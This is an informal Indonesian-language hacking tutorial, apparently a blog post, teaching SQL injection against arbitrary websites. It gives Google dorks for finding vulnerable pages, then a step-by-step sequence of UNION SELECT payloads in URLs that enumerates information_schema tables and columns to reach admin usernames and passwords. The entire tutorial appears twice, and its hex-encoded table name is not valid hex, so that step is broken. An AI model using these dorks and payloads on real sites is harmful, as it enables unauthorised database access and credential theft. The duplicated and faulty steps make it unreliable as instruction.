Inilah tutorialku soal hacking yang pertama:
Pertama-tama, weh-weh terlalu formal neh. Coretan2 dibawah ini buatan seorang yang bodoh jadi kalau ada salahnya mohon maap ya tmen2. Mungkin diantara kita ada yang bertanya? apakah yang dimaksud SQLi. Wah kalo gitu pertanyaannya silahkan googling pliss, SQLi (aka Sql Injection Structured Query Language Injection) adalah salah satu cara termudah untuk mengeksploitasi / hacking situs. Cara ini tergolong mudah tapi hasilnya bukan main-main, apalagi buat orang bodoh kayak saya wakkakakakka..Akan tetapi kebanyakan tutorial SQLi sangat buruk (bukan maksud mengejek), So itulah alasan mengapa aku menulis coretan ini. SQLi memang teknik dasar memasukkan query ke database untuk memperoleh admin dan passwordnya...
Step 1: Mencari Situs yang vulnerability SQLi
Mencari situs yang bisa terinfeksi virus sqli itu sangat mudah tinggal kita googling aj, dan masukin salah satu dork berikut:
inurl:news_view.php?id=
inurl:sql.php?id=
shredder-categories.php?id=
buy.php?category=
t-shirt/product.php?id=
sebenarnya masih banyak sekali model-model dork tetapi sayang, aku males nulisnya hehehehe
setelah masukin dork tadi, langsung pelototin situs2 yang nongol dilayar monitor, seperti:
http://www.malingshitanjing.com/index.php?id=3
untuk ngecek situs tersebut vulnerability sqli, hal yang harus dilakukan adalah ketik " pada akhir url. jadi sekarang urlnya jadi seperti ini:
http://www.malingshitanjing.com/index.php?id=3"
tekan enter dan kamu akan akan menemukan error
warning:you have error sql kampret kayak yang baca hehehe, check the manual qorresponden mysql bla bla....
bila itu terjadi berarti situs itu bisa injeksi
udah basa-basinya langsung aja ya bro
kita masukin querry lagi pada url
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1--
bila page yang tampil masih error atau normal( mungkin dihidden oleh admin), jangan putus asa terus masukin querrynya
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,4--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,5--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3,4,5,6--
sebut saja kita sudah dapat page yang berisi nomor 2
lalu kita masukan querry ini
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+0,1--
kemudian akan muncul page beserta isi dari "table"nya seperti id, name, password tapi muncul satu persatu. buruknya kita harus mencari satu-satu dengan menambahkan querry
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+1,1--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+2,1--
mungkin ada yang mengira url2 diatas tak dirubah tapi cobalah melirik ke akhir url, disitu "0,1" diganti dengan "1,1" terus "2,1" dst sampai kita dapat informasi sesuai keinginan kita. Tapi yang paling penting kita harus dapatkan tabel dengan nama seperti: tbl_user / tbl_admin / user / admin atau apalah yang mirip kata-kata tersebut. Anggap saja kita sudah dapat "tbl_user". Selanjutnya kita ubah "tbl_user" menjadi apa ya....????? pokoknya kita masuk ke piclist.com/techref/ascii lalu kita masukan "tbl_user" lalu kita konvert ke HEX string. lalu kode pada HEX kita copy dan pastekan pada url setelah kata table_name=0x
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,column_name,3,4,5,6+from+
information_schema.columns+where+table_name=0xM4l1N9SH1T4NJ1NG+limit+0,1--
jangan lupa tekan enter, lalu akan muncul page yang merupakan isi dari kolom tersebut
BERSAMBUNG, malas ngetiknya ngantuk.......klo ada yang komentar nanti saya lanjutin...ok
ingin melanjutkan tutorial part 2 klik disini
Mencari situs yang bisa terinfeksi virus sqli itu sangat mudah tinggal kita googling aj, dan masukin salah satu dork berikut:
inurl:news_view.php?id=
inurl:sql.php?id=
shredder-categories.php?id=
buy.php?category=
t-shirt/product.php?id=
sebenarnya masih banyak sekali model-model dork tetapi sayang, aku males nulisnya hehehehe
setelah masukin dork tadi, langsung pelototin situs2 yang nongol dilayar monitor, seperti:
http://www.malingshitanjing.com/index.php?id=3
untuk ngecek situs tersebut vulnerability sqli, hal yang harus dilakukan adalah ketik " pada akhir url. jadi sekarang urlnya jadi seperti ini:
http://www.malingshitanjing.com/index.php?id=3"
tekan enter dan kamu akan akan menemukan error
warning:you have error sql kampret kayak yang baca hehehe, check the manual qorresponden mysql bla bla....
bila itu terjadi berarti situs itu bisa injeksi
udah basa-basinya langsung aja ya bro
kita masukin querry lagi pada url
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1--
bila page yang tampil masih error atau normal( mungkin dihidden oleh admin), jangan putus asa terus masukin querrynya
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,4--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,5--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3,4,5,6--
sebut saja kita sudah dapat page yang berisi nomor 2
lalu kita masukan querry ini
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+0,1--
kemudian akan muncul page beserta isi dari "table"nya seperti id, name, password tapi muncul satu persatu. buruknya kita harus mencari satu-satu dengan menambahkan querry
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+1,1--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+2,1--
mungkin ada yang mengira url2 diatas tak dirubah tapi cobalah melirik ke akhir url, disitu "0,1" diganti dengan "1,1" terus "2,1" dst sampai kita dapat informasi sesuai keinginan kita. Tapi yang paling penting kita harus dapatkan tabel dengan nama seperti: tbl_user / tbl_admin / user / admin atau apalah yang mirip kata-kata tersebut. Anggap saja kita sudah dapat "tbl_user". Selanjutnya kita ubah "tbl_user" menjadi apa ya....????? pokoknya kita masuk ke piclist.com/techref/ascii lalu kita masukan "tbl_user" lalu kita konvert ke HEX string. lalu kode pada HEX kita copy dan pastekan pada url setelah kata table_name=0x
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,column_name,3,4,5,6+from+
information_schema.columns+where+table_name=0xM4l1N9SH1T4NJ1NG+limit+0,1--
jangan lupa tekan enter, lalu akan muncul page yang merupakan isi dari kolom tersebut
BERSAMBUNG, malas ngetiknya ngantuk.......klo ada yang komentar nanti saya lanjutin...ok
ingin melanjutkan tutorial part 2 klik disini
Greetz: YCL member